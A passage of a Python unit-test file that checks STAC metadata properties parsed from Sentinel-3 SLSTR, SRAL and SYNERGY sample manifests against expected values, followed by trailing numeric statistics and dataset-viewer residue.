for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_slstr_2_wst_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SL_2_WST____20190505T045344_20190505T063444_20190506T134130_"
"6059_044_204______MAR_O_NT_003.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"cloud_cover":
item.properties["eo:cloud_cover"],
"shape":
item.properties["proj:shape"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"salineWaterPixels_percentage":
item.properties["s3:salineWaterPixels_percentage"],
"landPixels_percentage":
item.properties["s3:landPixels_percentage"],
"coastalPixels_percentage":
item.properties["s3:coastalPixels_percentage"],
"freshInlandWaterPixels_percentage":
item.properties["s3:freshInlandWaterPixels_percentage"],
"tidalRegionPixels_percentage":
item.properties["s3:tidalRegionPixels_percentage"],
"cosmeticPixels_percentage":
item.properties["s3:cosmeticPixels_percentage"],
"duplicatedPixels_percentage":
item.properties["s3:duplicatedPixels_percentage"],
"saturatedPixels_percentage":
item.properties["s3:saturatedPixels_percentage"],
"outOfRangePixels_percentage":
item.properties["s3:outOfRangePixels_percentage"],
}
expected = {
"bbox": [-178.8, -85.9058, 170.226, 89.0387],
"epsg": 4326,
"datetime": "2019-05-05T05:44:14.154220Z",
"orbit_state": "descending",
"absolute_orbit": 16732,
"relative_orbit": 204,
"cloud_cover": 63.849162,
"shape": [1500, 40396],
"instrument": "SLSTR",
"mode": "EO",
"productType": "SL_2_WST___",
"salineWaterPixels_percentage": 67.822984,
"landPixels_percentage": 32.177016,
"coastalPixels_percentage": 0.0,
"freshInlandWaterPixels_percentage": 0.0,
"tidalRegionPixels_percentage": 0.0,
"cosmeticPixels_percentage": 42.348152,
"duplicatedPixels_percentage": 0.0,
"saturatedPixels_percentage": 0.0,
"outOfRangePixels_percentage": 25.145676,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_sral_2_lan_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SR_2_LAN____20201003T195855_20201003T204924_20201028T210401_"
"3029_063_270______LN3_O_NT_004.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"lrmModePercentage":
item.properties["s3:lrmModePercentage"],
"sarModePercentage":
item.properties["s3:sarModePercentage"],
"landPercentage":
item.properties["s3:landPercentage"],
"closedSeaPercentage":
item.properties["s3:closedSeaPercentage"],
"continentalIcePercentage":
item.properties["s3:continentalIcePercentage"],
"openOceanPercentage":
item.properties["s3:openOceanPercentage"],
}
expected = {
"bbox": [-72.2571, -81.4165, 120.308, 81.4178],
"epsg": 4326,
"datetime": "2020-10-03T20:24:09.317133Z",
"orbit_state": "ascending",
"absolute_orbit": 24113,
"relative_orbit": 270,
"instrument": "SRAL",
"mode": "EO",
"productType": "SR_2_LAN___",
"lrmModePercentage": 0.0,
"sarModePercentage": 100.0,
"landPercentage": 55.0,
"closedSeaPercentage": 0.0,
"continentalIcePercentage": 22.0,
"openOceanPercentage": 23.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_sral_2_wat_metadata_properties(self):
# Get the path of the test xml
manifest_path = test_data.get_path(
"data-files/"
"S3A_SR_2_WAT____20190326T011836_20190326T020243_20190420T170416_"
"2647_043_017______MAR_O_NT_003.SEN3")
metalinks = MetadataLinks(manifest_path)
product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
item = pystac.Item(
id=product_metadata.scene_id,
geometry=product_metadata.geometry,
bbox=product_metadata.bbox,
datetime=product_metadata.get_datetime,
properties={},
stac_extensions=[],
)
# ---- Add Extensions ----
# sat
sat = SatExtension.ext(item, add_if_missing=True)
fill_sat_properties(sat, metalinks.manifest)
# eo
eo = EOExtension.ext(item, add_if_missing=True)
fill_eo_properties(eo, metalinks.manifest)
# proj
proj = ProjectionExtension.ext(item, add_if_missing=True)
fill_proj_properties(proj, product_metadata)
# s3 properties
item.properties.update({**product_metadata.metadata_dict})
# Make a dictionary of the properties
s3_props = {
"bbox":
item.bbox,
"epsg":
item.properties["proj:epsg"],
"datetime":
item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
"orbit_state":
item.properties["sat:orbit_state"],
"absolute_orbit":
item.properties["sat:absolute_orbit"],
"relative_orbit":
item.properties["sat:relative_orbit"],
"instrument":
item.properties["s3:instrument"],
"mode":
item.properties["s3:mode"],
"productType":
item.properties["s3:productType"],
"lrmModePercentage":
item.properties["s3:lrmModePercentage"],
"sarModePercentage":
item.properties["s3:sarModePercentage"],
"landPercentage":
item.properties["s3:landPercentage"],
"closedSeaPercentage":
item.properties["s3:closedSeaPercentage"],
"continentalIcePercentage":
item.properties["s3:continentalIcePercentage"],
"openOceanPercentage":
item.properties["s3:openOceanPercentage"],
}
expected = {
"bbox": [-172.503, -65.9996, 179.499, 81.4155],
"epsg": 4326,
"datetime": "2019-03-26T01:40:39.237989Z",
"orbit_state": "descending",
"absolute_orbit": 16160,
"relative_orbit": 17,
"instrument": "SRAL",
"mode": "EO",
"productType": "SR_2_WAT___",
"lrmModePercentage": 0.0,
"sarModePercentage": 100.0,
"landPercentage": 3.0,
"closedSeaPercentage": 0.0,
"continentalIcePercentage": 0.0,
"openOceanPercentage": 97.0,
}
for k, v in expected.items():
self.assertIn(k, s3_props)
self.assertEqual(s3_props[k], v)
def test_parses_synergy_2_aod_metadata_properties(self):
    """Verify STAC properties parsed from a SY_2_AOD sample manifest."""
    # Locate the sample product shipped with the test data.
    manifest_path = test_data.get_path(
        "data-files/"
        "S3A_SY_2_AOD____20201119T153545_20201119T162000_20201120T223531_"
        "2655_065_168______LN2_O_NT_002.SEN3")
    metalinks = MetadataLinks(manifest_path)
    product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
    item = pystac.Item(
        id=product_metadata.scene_id,
        geometry=product_metadata.geometry,
        bbox=product_metadata.bbox,
        datetime=product_metadata.get_datetime,
        properties={},
        stac_extensions=[],
    )
    # Attach and populate the sat, eo and proj STAC extensions.
    fill_sat_properties(
        SatExtension.ext(item, add_if_missing=True), metalinks.manifest)
    fill_eo_properties(
        EOExtension.ext(item, add_if_missing=True), metalinks.manifest)
    fill_proj_properties(
        ProjectionExtension.ext(item, add_if_missing=True), product_metadata)
    # Fold the Sentinel-3-specific metadata into the item properties.
    item.properties.update(dict(product_metadata.metadata_dict))
    props = item.properties
    # Collect the values under test, keyed by a friendly name.
    s3_props = {
        "bbox": item.bbox,
        "epsg": props["proj:epsg"],
        "datetime": item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
        "orbit_state": props["sat:orbit_state"],
        "absolute_orbit": props["sat:absolute_orbit"],
        "relative_orbit": props["sat:relative_orbit"],
        "cloud_cover": props["eo:cloud_cover"],
        "shape": props["proj:shape"],
        "instrument": props["s3:instrument"],
        "mode": props["s3:mode"],
        "productType": props["s3:productType"],
        "salineWaterPixels_percentage":
        props["s3:salineWaterPixels_percentage"],
        "landPixels_percentage": props["s3:landPixels_percentage"],
    }
    expected = {
        "bbox": [-178.594, -84.4117, 177.852, 61.9656],
        "epsg": 4326,
        "datetime": "2020-11-19T15:57:52.526511Z",
        "orbit_state": "descending",
        "absolute_orbit": 24781,
        "relative_orbit": 168,
        "cloud_cover": 78.520162,
        "shape": [324, 4023],
        "instrument": "SYNERGY",
        "mode": "EO",
        "productType": "SY_2_AOD___",
        "salineWaterPixels_percentage": 73.501939,
        "landPixels_percentage": 26.485775,
    }
    for key, value in expected.items():
        self.assertIn(key, s3_props)
        self.assertEqual(s3_props[key], value)
def test_parses_synergy_2_syn_metadata_properties(self):
    """Verify STAC properties parsed from a SY_2_SYN sample manifest."""
    # Locate the sample product shipped with the test data.
    manifest_path = test_data.get_path(
        "data-files/"
        "S3A_SY_2_SYN____20190202T004600_20190202T004900_20190203T142947_"
        "0179_041_045_2700_LN2_O_NT_002.SEN3")
    metalinks = MetadataLinks(manifest_path)
    product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
    item = pystac.Item(
        id=product_metadata.scene_id,
        geometry=product_metadata.geometry,
        bbox=product_metadata.bbox,
        datetime=product_metadata.get_datetime,
        properties={},
        stac_extensions=[],
    )
    # Attach and populate the sat, eo and proj STAC extensions.
    fill_sat_properties(
        SatExtension.ext(item, add_if_missing=True), metalinks.manifest)
    fill_eo_properties(
        EOExtension.ext(item, add_if_missing=True), metalinks.manifest)
    fill_proj_properties(
        ProjectionExtension.ext(item, add_if_missing=True), product_metadata)
    # Fold the Sentinel-3-specific metadata into the item properties.
    item.properties.update(dict(product_metadata.metadata_dict))
    props = item.properties
    # Collect the values under test, keyed by a friendly name.
    s3_props = {
        "bbox": item.bbox,
        "epsg": props["proj:epsg"],
        "datetime": item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
        "orbit_state": props["sat:orbit_state"],
        "absolute_orbit": props["sat:absolute_orbit"],
        "relative_orbit": props["sat:relative_orbit"],
        "cloud_cover": props["eo:cloud_cover"],
        "instrument": props["s3:instrument"],
        "mode": props["s3:mode"],
        "productType": props["s3:productType"],
        "salineWaterPixels_percentage":
        props["s3:salineWaterPixels_percentage"],
        "coastalPixels_percentage": props["s3:coastalPixels_percentage"],
        "freshInlandWaterPixels_percentage":
        props["s3:freshInlandWaterPixels_percentage"],
        "tidalRegionPixels_percentage":
        props["s3:tidalRegionPixels_percentage"],
        "landPixels_percentage": props["s3:landPixels_percentage"],
    }
    expected = {
        "bbox": [130.373, 7.90436, 144.644, 20.9353],
        "epsg": 4326,
        "datetime": "2019-02-02T00:47:30.461765Z",
        "orbit_state": "descending",
        "absolute_orbit": 15418,
        "relative_orbit": 45,
        "cloud_cover": 39.446131,
        "instrument": "SYNERGY",
        "mode": "EO",
        "productType": "SY_2_SYN___",
        "salineWaterPixels_percentage": 95.649619,
        "coastalPixels_percentage": 0.004361,
        "freshInlandWaterPixels_percentage": 3e-05,
        "tidalRegionPixels_percentage": 0.0,
        "landPixels_percentage": 0.005341,
    }
    for key, value in expected.items():
        self.assertIn(key, s3_props)
        self.assertEqual(s3_props[key], value)
def test_parses_synergy_2_v10_metadata_properties(self):
    """Verify STAC properties parsed from a SY_2_V10 sample manifest."""
    # Locate the sample product shipped with the test data.
    manifest_path = test_data.get_path(
        "data-files/"
        "S3A_SY_2_V10____20191216T110000_20191226T110000_20200105T114106_"
        "ASIAN_ISLANDS_____LN2_O_NT_002.SEN3")
    metalinks = MetadataLinks(manifest_path)
    product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
    item = pystac.Item(
        id=product_metadata.scene_id,
        geometry=product_metadata.geometry,
        bbox=product_metadata.bbox,
        datetime=product_metadata.get_datetime,
        properties={},
        stac_extensions=[],
    )
    # Attach and populate the sat, eo and proj STAC extensions.
    fill_sat_properties(
        SatExtension.ext(item, add_if_missing=True), metalinks.manifest)
    fill_eo_properties(
        EOExtension.ext(item, add_if_missing=True), metalinks.manifest)
    fill_proj_properties(
        ProjectionExtension.ext(item, add_if_missing=True), product_metadata)
    # Fold the Sentinel-3-specific metadata into the item properties.
    item.properties.update(dict(product_metadata.metadata_dict))
    props = item.properties
    # Collect the values under test; V10 datetimes carry no fractional
    # seconds, hence the second-resolution format string.
    s3_props = {
        "bbox": item.bbox,
        "epsg": props["proj:epsg"],
        "datetime": item.datetime.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "orbit_state": props["sat:orbit_state"],
        "absolute_orbit": props["sat:absolute_orbit"],
        "relative_orbit": props["sat:relative_orbit"],
        "cloud_cover": props["eo:cloud_cover"],
        "instrument": props["s3:instrument"],
        "mode": props["s3:mode"],
        "productType": props["s3:productType"],
        "snowOrIcePixels_percentage":
        props["s3:snowOrIcePixels_percentage"],
        "landPixels_percentage": props["s3:landPixels_percentage"],
    }
    expected = {
        "bbox": [92.0045, -11.9955, 169.996, 28.9955],
        "epsg": 4326,
        "datetime": "2019-12-21T11:00:00Z",
        "orbit_state": "descending",
        "absolute_orbit": 19931,
        "relative_orbit": 323,
        "cloud_cover": 4.358878,
        "instrument": "SYNERGY",
        "mode": "EO",
        "productType": "SY_2_V10___",
        "snowOrIcePixels_percentage": 0.027358,
        "landPixels_percentage": 18.263485,
    }
    for key, value in expected.items():
        self.assertIn(key, s3_props)
        self.assertEqual(s3_props[key], value)
def test_parses_synergy_2_vg1_metadata_properties(self):
    """Verify STAC properties parsed from a SY_2_VG1 sample manifest."""
    # Locate the sample product shipped with the test data.
    manifest_path = test_data.get_path(
        "data-files/"
        "S3A_SY_2_VG1____20200609T120000_20200610T120000_20200615T121610_"
        "CENTRAL_AMERICA___LN2_O_NT_002.SEN3")
    metalinks = MetadataLinks(manifest_path)
    product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
    item = pystac.Item(
        id=product_metadata.scene_id,
        geometry=product_metadata.geometry,
        bbox=product_metadata.bbox,
        datetime=product_metadata.get_datetime,
        properties={},
        stac_extensions=[],
    )
    # Attach and populate the sat, eo and proj STAC extensions.
    fill_sat_properties(
        SatExtension.ext(item, add_if_missing=True), metalinks.manifest)
    fill_eo_properties(
        EOExtension.ext(item, add_if_missing=True), metalinks.manifest)
    fill_proj_properties(
        ProjectionExtension.ext(item, add_if_missing=True), product_metadata)
    # Fold the Sentinel-3-specific metadata into the item properties.
    item.properties.update(dict(product_metadata.metadata_dict))
    props = item.properties
    # Collect the values under test; VG1 datetimes carry no fractional
    # seconds, hence the second-resolution format string.
    s3_props = {
        "bbox": item.bbox,
        "epsg": props["proj:epsg"],
        "datetime": item.datetime.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "orbit_state": props["sat:orbit_state"],
        "absolute_orbit": props["sat:absolute_orbit"],
        "relative_orbit": props["sat:relative_orbit"],
        "cloud_cover": props["eo:cloud_cover"],
        "instrument": props["s3:instrument"],
        "mode": props["s3:mode"],
        "productType": props["s3:productType"],
        "snowOrIcePixels_percentage":
        props["s3:snowOrIcePixels_percentage"],
        "landPixels_percentage": props["s3:landPixels_percentage"],
    }
    expected = {
        "bbox": [-124.991, 3.60956e-12, -50.0, 49.9911],
        "epsg": 4326,
        "datetime": "2020-06-10T00:00:00Z",
        "orbit_state": "ascending",
        "absolute_orbit": 22455,
        "relative_orbit": 152,
        "cloud_cover": 9.465587,
        "instrument": "SYNERGY",
        "mode": "EO",
        "productType": "SY_2_VG1___",
        "snowOrIcePixels_percentage": 0.066818,
        "landPixels_percentage": 22.527562,
    }
    for key, value in expected.items():
        self.assertIn(key, s3_props)
        self.assertEqual(s3_props[key], value)
def test_parses_synergy_2_vgp_metadata_properties(self):
    """Verify STAC properties parsed from a SY_2_VGP sample manifest."""
    # Locate the sample product shipped with the test data.
    manifest_path = test_data.get_path(
        "data-files/"
        "S3B_SY_2_VGP____20210213T192726_20210213T201112_20210215T060438_"
        "2626_049_099______LN2_O_NT_002.SEN3")
    metalinks = MetadataLinks(manifest_path)
    product_metadata = ProductMetadata(manifest_path, metalinks.manifest)
    item = pystac.Item(
        id=product_metadata.scene_id,
        geometry=product_metadata.geometry,
        bbox=product_metadata.bbox,
        datetime=product_metadata.get_datetime,
        properties={},
        stac_extensions=[],
    )
    # Attach and populate the sat, eo and proj STAC extensions.
    fill_sat_properties(
        SatExtension.ext(item, add_if_missing=True), metalinks.manifest)
    fill_eo_properties(
        EOExtension.ext(item, add_if_missing=True), metalinks.manifest)
    fill_proj_properties(
        ProjectionExtension.ext(item, add_if_missing=True), product_metadata)
    # Fold the Sentinel-3-specific metadata into the item properties.
    item.properties.update(dict(product_metadata.metadata_dict))
    props = item.properties
    # Collect the values under test, keyed by a friendly name.
    # NOTE(review): "coastalPixelss" (double s) looks like a typo but
    # presumably mirrors the key emitted for VGP products — confirm
    # against the manifest before "fixing" it.
    s3_props = {
        "bbox": item.bbox,
        "epsg": props["proj:epsg"],
        "datetime": item.datetime.strftime("%Y-%m-%dT%H:%M:%S.%fZ"),
        "orbit_state": props["sat:orbit_state"],
        "absolute_orbit": props["sat:absolute_orbit"],
        "relative_orbit": props["sat:relative_orbit"],
        "cloud_cover": props["eo:cloud_cover"],
        "instrument": props["s3:instrument"],
        "mode": props["s3:mode"],
        "productType": props["s3:productType"],
        "snowOrIcePixels_percentage":
        props["s3:snowOrIcePixels_percentage"],
        "salineWaterPixels_percentage":
        props["s3:salineWaterPixels_percentage"],
        "coastalPixelss_percentage": props["s3:coastalPixelss_percentage"],
        "freshInlandWaterPixels_percentage":
        props["s3:freshInlandWaterPixels_percentage"],
        "tidalRegionPixels_percentage":
        props["s3:tidalRegionPixels_percentage"],
        "landPixels_percentage": props["s3:landPixels_percentage"],
    }
    expected = {
        "bbox": [-179.336, -84.0126, 179.986, 68.7507],
        "epsg": 4326,
        "datetime": "2021-02-13T19:49:19.044416Z",
        "orbit_state": "descending",
        "absolute_orbit": 14616,
        "relative_orbit": 99,
        "cloud_cover": 0.280665,
        "instrument": "SYNERGY",
        "mode": "EO",
        "productType": "SY_2_VGP___",
        "snowOrIcePixels_percentage": 0.207021,
        "salineWaterPixels_percentage": 86.89342,
        "coastalPixelss_percentage": 0.048629,
        "freshInlandWaterPixels_percentage": 0.355955,
        "tidalRegionPixels_percentage": 0.062851,
        "landPixels_percentage": 13.090312,
    }
    for key, value in expected.items():
        self.assertIn(key, s3_props)
        self.assertEqual(s3_props[key], value)
| 36.124772
| 78
| 0.580645
| 5,437
| 59,353
| 6.067133
| 0.092146
| 0.112469
| 0.079061
| 0.081184
| 0.869585
| 0.846
| 0.835723
| 0.813957
| 0.806469
| 0.80077
| 0
| 0.066655
| 0.308679
| 59,353
| 1,642
| 79
| 36.146772
| 0.737278
| 0.031254
| 0
| 0.800607
| 0
| 0
| 0.292132
| 0.190154
| 0
| 0
| 0
| 0
| 0.024261
| 1
| 0.01213
| false
| 0
| 0.006823
| 0
| 0.019712
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.